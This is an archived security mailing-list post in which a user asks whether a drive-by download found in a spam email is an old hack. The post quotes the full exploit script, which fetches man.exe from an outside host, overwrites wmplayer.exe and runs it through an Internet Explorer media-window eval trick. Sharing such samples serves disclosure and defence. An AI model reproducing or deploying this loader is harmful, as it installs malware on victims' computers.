| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Law12-F91vXOCcUB5Ay0002938a@hotmail.com>
From: axid3j1al at hotmail.com (axid3j1al axid3j1al)
Subject: Old Hack?
Has anyone see this little code injection hack.
Is this old?
Email has subject line "congranulations! you won $1169"
with body
http://sinaraevent.com/bbs/zipcode/6.htm
and code
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
braindwish has expired
_________________________________________________________________
Hot chart ringtones and polyphonics. Go to
http://ninemsn.com.au/mobilemania/default.asp
Powered by blists - more mailing lists